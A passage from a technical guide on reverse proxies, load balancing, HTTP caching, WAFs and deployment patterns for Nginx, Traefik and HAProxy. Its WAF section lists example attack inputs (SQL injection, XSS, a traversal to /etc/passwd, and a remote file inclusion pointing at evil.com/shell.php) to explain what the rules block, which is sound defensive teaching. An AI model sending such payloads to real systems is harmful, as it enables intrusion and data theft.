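        self.window = window
        self.events = defaultdict(deque)   # key -> request timestamps

    def track(self, key):
        now = time.monotonic()
        q = self.events[key]
        q.append(now)
        # Drop timestamps that have fallen out of the window.
        while q and q[0] <= now - self.window:
            q.popleft()
        return len(q)                      # roughly sc_http_req_rate(0)
```

The HAProxy rule above then corresponds to: deny with 429 whenever `track(client_ip)` exceeds 100.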

Traefik

Traefik is a modern reverse proxy designed for microservices and container environments. Its killer feature is automatic service discovery: it watches Docker, Kubernetes, and other orchestrators and automatically configures routing to new services.

Docker Integration

# docker-compose.yml with Traefik
version: '3'

services:
  traefik:
    image: traefik:v3.0
    command:
      - --api.dashboard=true
      - --providers.docker=true
      - --providers.docker.exposedByDefault=false
      - --entrypoints.web.address=:80
      - --entrypoints.websecure.address=:443
      - --certificatesresolvers.letsencrypt.acme.email=admin@example.com
      - --certificatesresolvers.letsencrypt.acme.storage=/letsencrypt/acme.json
      - --certificatesresolvers.letsencrypt.acme.httpchallenge.entrypoint=web
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock:ro
      - letsencrypt:/letsencrypt

  api:
    image: myapp/api:latest
    labels:
      # Traefik discovers this service via Docker labels
      - traefik.enable=true
      - traefik.http.routers.api.rule=Host(`api.example.com`)
      - traefik.http.routers.api.tls.certresolver=letsencrypt
      - traefik.http.services.api.loadbalancer.server.port=8080

      # Middleware: rate limiting
      - traefik.http.middlewares.api-ratelimit.ratelimit.average=100
      - traefik.http.middlewares.api-ratelimit.ratelimit.burst=50
      - traefik.http.routers.api.middlewares=api-ratelimit

  frontend:
    image: myapp/frontend:latest
    labels:
      - traefik.enable=true
      - traefik.http.routers.frontend.rule=Host(`www.example.com`)
      - traefik.http.routers.frontend.tls.certresolver=letsencrypt

volumes:
  letsencrypt:

Traefik vs. Nginx as Kubernetes Ingress: Traefik natively integrates with Kubernetes IngressRoute CRDs and automatically discovers services. Nginx Ingress Controller requires ConfigMaps or annotations and has a more traditional configuration model. Traefik is often preferred for dynamic environments; Nginx Ingress for environments where the configuration is more static and the Nginx ecosystem (ModSecurity, etc.) is needed.

Load Balancing Deep Dive

Algorithms

Algorithm            | Description                                                       | Best For
---------------------|-------------------------------------------------------------------|---------
Round Robin          | Distributes requests sequentially across servers                  | Equal-capacity servers, stateless requests
Weighted Round Robin | Like round robin, but higher-weight servers get more traffic      | Mixed server sizes (e.g., c5.xlarge + c5.2xlarge)
Least Connections    | Routes to the server with fewest active connections               | Requests with variable processing times
IP Hash              | Hash of client IP determines server (consistent mapping)          | Session persistence without cookies
Consistent Hashing   | Hash ring that minimizes redistribution when servers are added/removed | Caching proxies (only ~1/N keys move when adding a server)
Random Two Choices   | Pick 2 random servers, route to the one with fewer connections    | Large server pools (simple, surprisingly effective)

Consistent hashing is worth understanding deeply. Traditional hash-based routing (e.g., server = hash(client_ip) % N) breaks when N changes—adding or removing a server remaps almost all clients. Consistent hashing places servers on a virtual ring (hash values 0 to 2^32). Each request is hashed and routed to the next server clockwise on the ring. When a server is added, only its neighbors' traffic is affected (~1/N keys move instead of all).

Consistent Hash Ring:

        Server A (hash: 100)
           /
    ──────●─────────────────●── Server B (hash: 300)
    │                       │
    │    Hash Ring          │
    │    (0 to 2^32)        │
    │                       │
    ──────●─────────────────●── Server C (hash: 500)
           \
        Server D (hash: 700)

Request with hash 250 → routes to Server B (next clockwise)
Request with hash 450 → routes to Server C
Adding Server E (hash: 400) → only requests 301-400 move from C to E
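The ring above can be sketched in a few lines of Python; the virtual-node count and hash function here are illustrative choices, not a canonical implementation:

```python
import bisect
import hashlib

def ring_hash(key: str) -> int:
    # Stable 32-bit position on the ring (0 to 2^32 - 1).
    return int.from_bytes(hashlib.md5(key.encode()).digest()[:4], "big")

class HashRing:
    def __init__(self, servers, vnodes=100):
        # Each server gets many virtual points to smooth load imbalance.
        self.ring = sorted(
            (ring_hash(f"{s}#{i}"), s) for s in servers for i in range(vnodes)
        )
        self.points = [p for p, _ in self.ring]

    def route(self, key: str) -> str:
        # Next point clockwise; wrap past the last point back to the first.
        i = bisect.bisect(self.points, ring_hash(key)) % len(self.points)
        return self.ring[i][1]

before = HashRing(["A", "B", "C"])
after = HashRing(["A", "B", "C", "D"])
keys = [f"req-{n}" for n in range(1000)]
# Every key that moves must move to the new server D; roughly 1/4 should.
moved = sum(before.route(k) != after.route(k) for k in keys)
```

Virtual nodes matter in practice: with one point per server, an unlucky hash layout can give one server most of the ring; with ~100 points per server the arcs average out.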

Layer 4 vs. Layer 7 Load Balancing

| Feature | Layer 4 (TCP/UDP) | Layer 7 (HTTP/HTTPS) |
| --- | --- | --- |
| Routing basis | IP address, port | URL path, host header, cookies, HTTP headers |
| Performance | Higher throughput, lower latency | Slightly lower throughput (must parse HTTP) |
| SSL termination | Passthrough or termination | Termination (can inspect HTTP after decryption) |
| Features | Basic health checks, connection limiting | Content-based routing, header manipulation, WAF |
| Use cases | Database load balancing, raw TCP services, ultra-high throughput | HTTP APIs, web applications, microservice routing |
| AWS service | NLB (Network Load Balancer) | ALB (Application Load Balancer) |

When to use L4: When you need the absolute highest performance (millions of requests/sec), when the backend protocol isn't HTTP (databases, custom TCP protocols), or when you want SSL passthrough (backend handles its own TLS).

When to use L7: When you need content-based routing (route /api/v1/users to user-service, /api/v1/orders to order-service), when you need to inspect or modify HTTP headers, or when you want advanced features like sticky sessions with cookies.

Health Checking

| Type | Mechanism | Pros | Cons |
| --- | --- | --- | --- |
| Active | Load balancer periodically sends health check requests to backends | Detects failures before user traffic is affected | Adds load to backends, may trigger rate limits |
| Passive | Monitor actual traffic responses for errors | No additional load, reflects real user experience | Requires traffic to detect failures (cold start problem) |
| Combined | Active checks supplement passive monitoring | Best of both worlds | More complex configuration |

# Nginx active health checking (requires nginx-plus or third-party module)
upstream backend {
    zone backend 64k;
    server 10.0.1.1:8080;
    server 10.0.1.2:8080;

    # Check /health every 5 seconds, consider healthy after 2 passes,
    # unhealthy after 3 failures
    health_check interval=5s fails=3 passes=2 uri=/health;
}
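The fails/passes hysteresis in that directive is worth modeling explicitly. A sketch of the same state machine, independent of nginx, under the same thresholds:

```python
class HealthTracker:
    """Hysteresis as in `health_check fails=3 passes=2`: a backend turns
    unhealthy after 3 consecutive failed probes, and healthy again only
    after 2 consecutive successful probes."""

    def __init__(self, fails=3, passes=2):
        self.fails, self.passes = fails, passes
        self.fail_streak = self.pass_streak = 0
        self.healthy = True

    def record(self, ok: bool):
        if ok:
            self.fail_streak = 0
            self.pass_streak += 1
            if not self.healthy and self.pass_streak >= self.passes:
                self.healthy = True
        else:
            self.pass_streak = 0
            self.fail_streak += 1
            if self.healthy and self.fail_streak >= self.fails:
                self.healthy = False

t = HealthTracker()
for _ in range(3):
    t.record(False)   # three failures in a row -> marked unhealthy
t.record(True)        # one success is not enough to recover
recovering = t.healthy
t.record(True)        # second consecutive success -> healthy again
```

Requiring consecutive passes/failures prevents a flapping backend from being rapidly added and removed from the pool on every probe.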

Connection Draining

During deployments, you need to gracefully remove servers from the load balancer pool without dropping active connections:

  1. Mark server as draining: Stop routing new connections to it
  2. Wait for active connections to complete: Set a drain timeout (e.g., 30 seconds)
  3. Deploy: Update the application on the drained server
  4. Re-add server: Mark it as healthy and start routing traffic again

This is handled automatically by Kubernetes during rolling updates (via terminationGracePeriodSeconds and preStop hooks) and by cloud load balancers (deregistration delay on target groups).
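On the Kubernetes side, the draining steps above map to a couple of Deployment fields; this excerpt is a sketch with illustrative names and timings, assuming the container image ships a `sleep` binary:

```yaml
# Hypothetical Deployment excerpt: give in-flight requests time to drain.
spec:
  template:
    spec:
      terminationGracePeriodSeconds: 45   # total budget before SIGKILL
      containers:
        - name: app
          lifecycle:
            preStop:
              exec:
                # Pause so the Pod is removed from Service endpoints
                # (and load balancers stop sending it traffic) before
                # the container receives SIGTERM.
                command: ["sleep", "15"]
```

The preStop sleep covers the propagation delay between "Pod marked terminating" and "load balancer stops routing to it", which are not synchronized.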

Caching at the Proxy Layer

Cache-Control Headers

HTTP caching is governed by the Cache-Control header. Understanding these directives is essential:

| Directive | Description |
| --- | --- |
| public | Response can be cached by any cache (CDN, proxy, browser) |
| private | Response can only be cached by the browser (not CDN/proxy) |
| no-cache | Cache can store the response BUT must revalidate with the origin before serving (misleading name!) |
| no-store | Response must never be cached anywhere |
| max-age=N | Response is fresh for N seconds |
| s-maxage=N | Like max-age but only for shared caches (CDN/proxy); overrides max-age for shared caches |
| stale-while-revalidate=N | Serve stale content for N seconds while fetching fresh content in the background |
| stale-if-error=N | Serve stale content for N seconds if the origin returns an error |
| immutable | Content will never change; the browser should never revalidate (use with cache-busted URLs) |

Practical caching strategy:

Static assets (hashed filenames: app.a1b2c3.js):
  Cache-Control: public, max-age=31536000, immutable

API responses (user-specific):
  Cache-Control: private, no-cache

API responses (public, changes slowly):
  Cache-Control: public, max-age=300, stale-while-revalidate=60

HTML pages:
  Cache-Control: no-cache
  (Always revalidate, but can use 304 Not Modified with ETag)

Authenticated API responses:
  Cache-Control: private, no-store
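In Nginx, the static-asset and HTML policies above might be applied like this (paths are illustrative; a real config would also set `root`/`try_files`):

```nginx
# Hashed build artifacts under /assets/ never change, so cache them hard.
location /assets/ {
    add_header Cache-Control "public, max-age=31536000, immutable";
}

# HTML entry points: always revalidate (ETag/304 keeps this cheap).
location / {
    add_header Cache-Control "no-cache";
}
```

Note that `add_header` only applies to 2xx/3xx responses by default; pass `always` if error responses also need the header.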

Microcaching

Even caching dynamic content for 1 second can dramatically reduce backend load under high traffic. If 10,000 requests hit the same endpoint within 1 second, only 1 reaches the backend:

proxy_cache_path /var/cache/nginx/micro
    levels=1:2 keys_zone=micro:1m max_size=100m;

location /api/popular-endpoint {
    proxy_pass http://app_backend;
    proxy_cache micro;
    proxy_cache_valid 200 1s;          # Cache successful responses for just 1 second
    proxy_cache_lock on;               # Only one request fetches from backend;
                                       # others wait for the cached result
    proxy_cache_use_stale updating;    # Serve stale while refreshing
}

Reverse Proxy vs. Forward Proxy

| Feature | Reverse Proxy | Forward Proxy |
| --- | --- | --- |
| Position | In front of servers | In front of clients |
| Purpose | Protect/optimize backend servers | Protect/anonymize clients |
| Use cases | Load balancing, SSL termination, caching, security, compression | Corporate firewalls, anonymity, content filtering, compliance |
| Client awareness | Client doesn't know about backend servers | Server doesn't know about actual clients |
| Configuration | Server-side (server admin configures) | Client-side (client configures proxy settings) |
| Examples | Nginx, Caddy, HAProxy, Traefik | Squid, corporate proxies, VPNs, SOCKS proxies |

Reverse proxy use cases in detail:

- SSL/TLS termination: Decrypt HTTPS at the proxy so backend servers handle plain HTTP (simpler, faster backend processing)
- Static file serving: Serve CSS/JS/images directly from disk without hitting the application server
- Compression: gzip/brotli compress responses, reducing bandwidth usage by 60-80%
- Request buffering: Buffer slow client uploads and send them to the backend all at once, freeing the backend connection
- Security: Hide backend topology, rate limit abusive clients, filter malicious requests
- A/B testing: Route a percentage of traffic to different backend versions

Web Application Firewall (WAF)

A WAF inspects HTTP/HTTPS traffic and blocks malicious requests before they reach your application. It operates at Layer 7, understanding HTTP semantics.

What a WAF Protects Against

| Attack Category | Examples | WAF Rule |
| --- | --- | --- |
| SQL Injection | ' OR 1=1 --, UNION SELECT | Detect SQL keywords in query params/body |
| Cross-Site Scripting (XSS) | <script>alert(1)</script> | Detect HTML/JS in input fields |
| Path Traversal | ../../etc/passwd | Detect directory traversal patterns |
| HTTP Protocol Violations | Malformed headers, invalid methods | Enforce HTTP spec compliance |
| Bot Traffic | Scrapers, credential stuffing | Rate limiting, CAPTCHA, bot signatures |
| File Inclusion | include=http://evil.com/shell.php | Block remote file references |

OWASP Core Rule Set (CRS) is the standard open-source WAF rule set, covering the OWASP Top 10 vulnerabilities. It runs on ModSecurity (Nginx/Apache module), Coraza (Go), and cloud WAFs.

Cloud WAFs (AWS WAF, Cloudflare WAF, Azure WAF) provide managed rule sets and are simpler to operate than self-hosted solutions. AWS WAF integrates with ALB and CloudFront, inspecting requests at the edge before they reach your backend.

False positives are the biggest operational challenge with WAFs. A legitimate request containing the word SELECT (e.g., a product named "Select Premium") might be blocked by SQL injection rules. Manage false positives with: a learning mode/logging-only period before enforcement, per-rule exceptions, URI-specific rule overrides, and regular rule tuning.
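With ModSecurity, a deny rule and a per-URI exception of the kind described above might look like this; the rule IDs are made up for illustration, though 942100 is the CRS rule that applies libinjection SQLi detection:

```apacheconf
# Block requests whose arguments look like SQL injection (libinjection).
SecRule ARGS "@detectSQLi" \
    "id:1000001,phase:2,deny,status:403,log,msg:'SQLi detected'"

# Hypothetical per-URI exception: the product-search endpoint legitimately
# sends SQL-looking terms, so disable CRS rule 942100 just for that path.
SecRule REQUEST_URI "@beginsWith /products/search" \
    "id:1000002,phase:1,pass,nolog,ctl:ruleRemoveById=942100"
```

Scoping exceptions to a URI (rather than disabling the rule globally) keeps protection intact everywhere else.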

Production Deployment Patterns

Zero-Downtime Deployments with Nginx

Nginx supports graceful reloads (nginx -s reload) that enable zero-downtime configuration changes:

  1. Master process spawns new worker processes with the new configuration
  2. Master process signals old worker processes to stop accepting new connections
  3. Old workers finish processing active requests, then exit
  4. Only new workers remain, running the updated configuration

No connections are dropped during this process.
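Operationally, the reload is usually gated on a configuration test so that a typo can never take down the proxy:

```shell
# Validate the new config; signal the master to reload only if it parses.
nginx -t && nginx -s reload
```

If `nginx -t` fails, the running workers keep serving with the old, known-good configuration.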

Blue-Green with Proxy Switching

# Blue-green deployment: switch backends by changing upstream

# Active (green):
upstream app_backend {
    server 10.0.1.10:8080;    # Green instances
    server 10.0.1.11:8080;
}

# To switch to blue, update config and reload:
# upstream app_backend {
#     server 10.0.2.10:8080;  # Blue instances
#     server 10.0.2.11:8080;
# }

Canary Releases via Weighted Routing

# Route 5% of traffic to canary, 95% to stable
upstream app_stable {
    server 10.0.1.10:8080;
    server 10.0.1.11:8080;
}

upstream app_canary {
    server 10.0.2.10:8080;
}

split_clients "${remote_addr}" $upstream_variant {
    5%   app_canary;
    *    app_stable;
}

server {
    location /api/ {
        # A variable in proxy_pass is matched against the named upstream
        # groups above, so no "if" block is needed.
        proxy_pass http://$upstream_variant;
    }
}

A/B Testing at the Proxy Layer

# Route users to different backends based on cookie
map $cookie_ab_group $backend {
    "A"     app_variant_a;
    "B"     app_variant_b;
    default app_variant_a;
}

upstream app_variant_a {
    server 10.0.1.10:8080;
}

upstream app_variant_b {
    server 10.0.2.10:8080;
}

server {
    location /api/ {
        # Set A/B cookie if not present
        if ($cookie_ab_group = "") {
            add_header Set-Cookie "ab_group=A; Path=/; Max-Age=2592000";
            # (In practice, randomize A/B assignment with a map or Lua script)
        }
        proxy_pass http://$backend;
    }
}
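The randomized assignment hinted at in the comment can be done natively with split_clients rather than Lua; the hash key and bucket sizes below are illustrative:

```nginx
# Deterministic pseudo-random bucket per client, computed at the http level.
split_clients "${remote_addr}${http_user_agent}" $ab_assign {
    50%  "A";
    *    "B";
}

# Then, inside the location block, hand out the computed group:
# add_header Set-Cookie "ab_group=$ab_assign; Path=/; Max-Age=2592000";
```

Hashing the client address plus user agent makes assignment sticky for a given client even before the cookie is set.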

Comparison Summary

| Feature | Nginx | Apache | Caddy | HAProxy | Traefik |
| --- | --- | --- | --- | --- | --- |
| Primary role | Web server + proxy | Web server | Web server + proxy | Load balancer + proxy | Proxy + discovery |
| Auto HTTPS | No (use certbot) | No (use certbot) | Yes (built-in) | No | Yes (built-in) |
| Config language | Custom DSL | Custom DSL | Caddyfile / JSON | Custom DSL | YAML / labels |
| Dynamic config | Reload required | .htaccess (per-dir) | API + hot reload | Reload required | Auto-discovery |
| K8s integration | Ingress controller | Limited | Ingress controller | Ingress controller | Native (CRDs) |
| Performance | Excellent | Good | Good | Excellent | Good |
| Best for | General-purpose | Legacy, mod_php | Simple setups, auto-TLS | High-perf LB | Container environments |